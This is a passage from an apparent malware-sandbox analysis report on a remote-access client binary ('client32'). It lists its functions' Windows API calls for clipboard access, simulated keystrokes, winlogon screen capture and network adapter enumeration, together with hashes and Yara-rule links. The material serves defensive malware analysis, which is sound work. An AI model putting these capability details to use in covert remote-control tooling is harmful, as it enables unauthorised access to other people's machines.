                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ControlDevicekeybd_event
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1421710848-0
                                                                                                                                                                                • Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                                                                                                                • Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
                                                                                                                                                                                • Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                                                                                                                                • Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0
                                                                                                                                                                                Function 110335A0 Relevance: 3.0, APIs: 2, Instructions: 49clipboardCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110335F6
                                                                                                                                                                                • SetClipboardData.USER32(00000000,00000000), ref: 11033612
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Clipboard$DataFormatName
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3172747766-0
                                                                                                                                                                                • Opcode ID: 052e4e56b84e73672e5d91cfb059c5481351f00dda31e3de48a172ee3eaf9ef8
                                                                                                                                                                                • Instruction ID: d021e7b1abaf81fd48200924965e9797cc36530c630056afc83bc75e16402c3f
                                                                                                                                                                                • Opcode Fuzzy Hash: 052e4e56b84e73672e5d91cfb059c5481351f00dda31e3de48a172ee3eaf9ef8
                                                                                                                                                                                • Instruction Fuzzy Hash: 6701D830D2E124AEC714DF608C8097EB7ACEF8960BB018556FC419A380EF29A601D7F6
                                                                                                                                                                                Function 11113410 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 73COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetStockObject.GDI32(0000000D), ref: 11113429
                                                                                                                                                                                • GetObjectA.GDI32(00000000,0000003C,?), ref: 11113436
                                                                                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                                                • AddFontResourceA.GDI32(SMALLE.FON), ref: 1111347C
                                                                                                                                                                                • AddFontResourceA.GDI32(SYMBOLE.FON), ref: 11113483
                                                                                                                                                                                • AddFontResourceA.GDI32(SERIFE.FON), ref: 1111348A
                                                                                                                                                                                • AddFontResourceA.GDI32(SSERIFE.FON), ref: 11113491
                                                                                                                                                                                • AddFontResourceA.GDI32(COURE.FON), ref: 11113498
                                                                                                                                                                                • AddFontResourceA.GDI32(VGASYS.FON), ref: 1111349F
                                                                                                                                                                                • AddFontResourceA.GDI32(VGAFIX.FON), ref: 111134A6
                                                                                                                                                                                • AddFontResourceA.GDI32(SMALLF.FON), ref: 111134AD
                                                                                                                                                                                • AddFontResourceA.GDI32(SYMBOLF.FON), ref: 111134B4
                                                                                                                                                                                • AddFontResourceA.GDI32(SERIFF.FON), ref: 111134BB
                                                                                                                                                                                • AddFontResourceA.GDI32(SSERIFF.FON), ref: 111134C2
                                                                                                                                                                                • AddFontResourceA.GDI32(COURF.FON), ref: 111134C9
                                                                                                                                                                                • AddFontResourceA.GDI32(8514SYS.FON), ref: 111134D0
                                                                                                                                                                                • AddFontResourceA.GDI32(8514FIX.FON), ref: 111134D7
                                                                                                                                                                                • AddFontResourceA.GDI32(DOSAPP.FON), ref: 111134DE
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FontResource$Object$Stock__wcstoi64
                                                                                                                                                                                • String ID: *AddFonts$8514FIX.FON$8514SYS.FON$COURE.FON$COURF.FON$DOSAPP.FON$General$SERIFE.FON$SERIFF.FON$SMALLE.FON$SMALLF.FON$SSERIFE.FON$SSERIFF.FON$SYMBOLE.FON$SYMBOLF.FON$VGAFIX.FON$VGASYS.FON
                                                                                                                                                                                • API String ID: 3930771858-1504324163
                                                                                                                                                                                • Opcode ID: b7e0c524170d32f21b477f8ad7f05e45f914da70007e608d6619faa1ed059217
                                                                                                                                                                                • Instruction ID: 1c2b7212b2555d0daf2ee27fdec4443dfaf9e989d704cef7684ba2ea19cc3389
                                                                                                                                                                                • Opcode Fuzzy Hash: b7e0c524170d32f21b477f8ad7f05e45f914da70007e608d6619faa1ed059217
                                                                                                                                                                                • Instruction Fuzzy Hash: 8F119324B0092D6AD6246BFB8C58FEFFFB8DB04266F080096F418962C1DD185804CBF6
                                                                                                                                                                                Function 11125340 Relevance: 58.1, APIs: 20, Strings: 13, Instructions: 369registrylibraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 11088BE0: IsWindow.USER32(11005652), ref: 11088BFC
                                                                                                                                                                                  • Part of subcall function 11088BE0: IsWindow.USER32(?), ref: 11088C16
                                                                                                                                                                                • GetStockObject.GDI32(00000005), ref: 11125505
                                                                                                                                                                                • RegisterClassA.USER32(00000003), ref: 1112550E
                                                                                                                                                                                • InterlockedIncrement.KERNEL32(111EAC50), ref: 11125560
                                                                                                                                                                                • GetStockObject.GDI32(00000005), ref: 11125586
                                                                                                                                                                                • RegisterClassA.USER32(00000020), ref: 11125592
                                                                                                                                                                                • GetLastError.KERNEL32(?,?), ref: 1112559F
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 111255D1
                                                                                                                                                                                • CreateWindowExA.USER32(?,111B8B70,00000000,52000000,?,?,?,?,?,00000000,00000000,?), ref: 1112562C
                                                                                                                                                                                • LoadLibraryA.KERNEL32(User32.dll,View,TouchWidth,00000020,00000000,?,?), ref: 11125676
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RegisterTouchWindow), ref: 111256F7
                                                                                                                                                                                • GetLastError.KERNEL32(?,?), ref: 11125716
                                                                                                                                                                                • CreateWindowExA.USER32(?,NSMRemote32,00000000,52300000,?,?,?,?,?,00000000,00000000,?), ref: 11125751
                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 1112575A
                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 1112577B
                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 11125789
                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000EC), ref: 11125792
                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 111257A1
                                                                                                                                                                                • SetLastError.KERNEL32(00000078,?,?), ref: 111257D6
                                                                                                                                                                                • GetActiveWindow.USER32 ref: 111257F1
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000001,?,?,?,?,?,?), ref: 11125838
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$ErrorLast$ClassClientCreateLibraryLongObjectRectRegisterStock$ActiveAddressCurrentExitFreeIncrementInterlockedLoadMessageProcProcessThreadwsprintf
                                                                                                                                                                                • String ID: $..\ctl32\Remote.cpp$::IsWindow(hWnd)$FullScreen$NSMRemote32$RegisterTouchWindow$Remote!RegisterTouchWindow() failed for touch border, error %d$ScaleToFit$TouchWidth$User32.dll$View$hWndTouch$ok || GetLastError() == 1410
                                                                                                                                                                                • API String ID: 3842685962-3599241244
                                                                                                                                                                                • Opcode ID: 1764cf9b398980f2a90f4010eb79e1881eda4300466cbecfc7b0ffd6d3e3f8ba
                                                                                                                                                                                • Instruction ID: aebb2c544496697f819fb793f5c05646e13ba987c1b1a01c03c9f8d0d31522eb
                                                                                                                                                                                • Opcode Fuzzy Hash: 1764cf9b398980f2a90f4010eb79e1881eda4300466cbecfc7b0ffd6d3e3f8ba
                                                                                                                                                                                • Instruction Fuzzy Hash: 41F116B5E01618AFDB54DFA9D980B9EFBF5BB48304F60856EE51AE7240D730A940CF60
                                                                                                                                                                                Function 1111F6B0 Relevance: 52.9, APIs: 28, Strings: 2, Instructions: 372COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • _memmove.LIBCMT ref: 1111F6FF
                                                                                                                                                                                • IntersectRect.USER32(?,?,?), ref: 1111F72B
                                                                                                                                                                                • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 1111F75B
                                                                                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 1111F792
                                                                                                                                                                                • SetBkColor.GDI32(?,00000000), ref: 1111F7B7
                                                                                                                                                                                • SetTextColor.GDI32(?,00FFFFFF), ref: 1111F7C3
                                                                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 1111F7CC
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ColorText$CompatibleCreateIntersectModeRect_memmove
                                                                                                                                                                                • String ID: ..\ctl32\Remote.cpp$wb.bm_size
                                                                                                                                                                                • API String ID: 3217446216-4207375298
                                                                                                                                                                                • Opcode ID: 15f529c9b8fbe9d68a1938c33563c212b8d79534d304f752bae393f7bead30c8
                                                                                                                                                                                • Instruction ID: a9d4e3808ea5142838295dc531bb9642d261e5fde60422abcf837552ac37aa4e
                                                                                                                                                                                • Opcode Fuzzy Hash: 15f529c9b8fbe9d68a1938c33563c212b8d79534d304f752bae393f7bead30c8
                                                                                                                                                                                • Instruction Fuzzy Hash: FFE15FB5E0022A9FDB14CF64DD84BAEF7B4FF48704F1081A9F919AB284D774A944CB61
                                                                                                                                                                                Function 110B3100 Relevance: 50.9, APIs: 23, Strings: 6, Instructions: 178filewindowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110B3130
                                                                                                                                                                                • OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110B3141
                                                                                                                                                                                • OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110B314F
                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FA), ref: 110B3183
                                                                                                                                                                                • OpenFileMappingA.KERNEL32(000F001F,00000000,Client32DIB), ref: 110B31A6
                                                                                                                                                                                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110B31C2
                                                                                                                                                                                • GetDC.USER32(00000000), ref: 110B31E8
                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 110B31FC
                                                                                                                                                                                • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110B321F
                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 110B3236
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 110B323F
                                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110B3276
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 110B327F
                                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 110B328E
                                                                                                                                                                                • GdiFlush.GDI32 ref: 110B32A2
                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 110B32AD
                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 110B32B4
                                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 110B32BE
                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 110B32C8
                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 110B32D4
                                                                                                                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 110B32DE
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110B32E5
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110B3309
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
                                                                                                                                                                                • String ID: Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
                                                                                                                                                                                • API String ID: 2071925733-2101319552
                                                                                                                                                                                • Opcode ID: cea1f953e0d20ff24f55d800d04589fe7cba30f987155b1b198211e1dfb46378
                                                                                                                                                                                • Instruction ID: 4116a02b123aa608432531ba698621a05075ff29bb652617cbc71955754d1d1a
                                                                                                                                                                                • Opcode Fuzzy Hash: cea1f953e0d20ff24f55d800d04589fe7cba30f987155b1b198211e1dfb46378
                                                                                                                                                                                • Instruction Fuzzy Hash: A9518679E40229ABDB14CFE4CD89F9EBBB4FB48704F104064F921AB644D774A900CB65
                                                                                                                                                                                Function 1103D530 Relevance: 49.4, APIs: 10, Strings: 18, Instructions: 385libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(netapi32.dll), ref: 1103D576
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Netbios), ref: 1103D590
                                                                                                                                                                                • wsprintfA.USER32 ref: 1103D6EE
                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 1103D747
                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 1103D779
                                                                                                                                                                                • LoadLibraryA.KERNEL32(IPHLPAPI.DLL), ref: 1103D793
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 1103D7AF
                                                                                                                                                                                • wsprintfA.USER32 ref: 1103D8C8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$AddressFreeLoadProcwsprintf
                                                                                                                                                                                • String ID: %02x%02x%02x%02x%02x%02x$%d adapters in chain, %d adapters by size$* $3$CLTCONN.CPP$GetAdaptersInfo$IPHLPAPI.DLL$Info. Netbios macaddr=%s$Info. Set MacAddr to %s$Info. Unable to load netapi32$Info. macaddr[%d]=%s, ipaddr=%hs/%hs$ListenAddress$Netbios$TCPIP$VIRTNET$Warning. Netbios() returned x%x$netapi32.dll$pGetAdaptersInfo
                                                                                                                                                                                • API String ID: 3145926599-3574733319
                                                                                                                                                                                • Opcode ID: 188d031a9fc17ef05e3f3de50b8f397d5f7447160d3574ff14ade69eb447b8d0
                                                                                                                                                                                • Instruction ID: 9380186eaa86aba5e78307d08d1cef0eec38285017acdf678952b44c5cd5fdba
                                                                                                                                                                                • Opcode Fuzzy Hash: 188d031a9fc17ef05e3f3de50b8f397d5f7447160d3574ff14ade69eb447b8d0
                                                                                                                                                                                • Instruction Fuzzy Hash: 60E13A75D1429A9FEB17CB648C90BEEBBF96F85305F4400D9E858B7240E630AB44CF61
                                                                                                                                                                                Function 11005410 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Object$Delete$Select$MessagePostQuitShowWindow__itowwsprintf
                                                                                                                                                                                • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
                                                                                                                                                                                • API String ID: 3442046557-770455996
                                                                                                                                                                                • Opcode ID: b260747c8f968527a83576dee86365f6f35b5e17a707623b7f74d3e93623c211
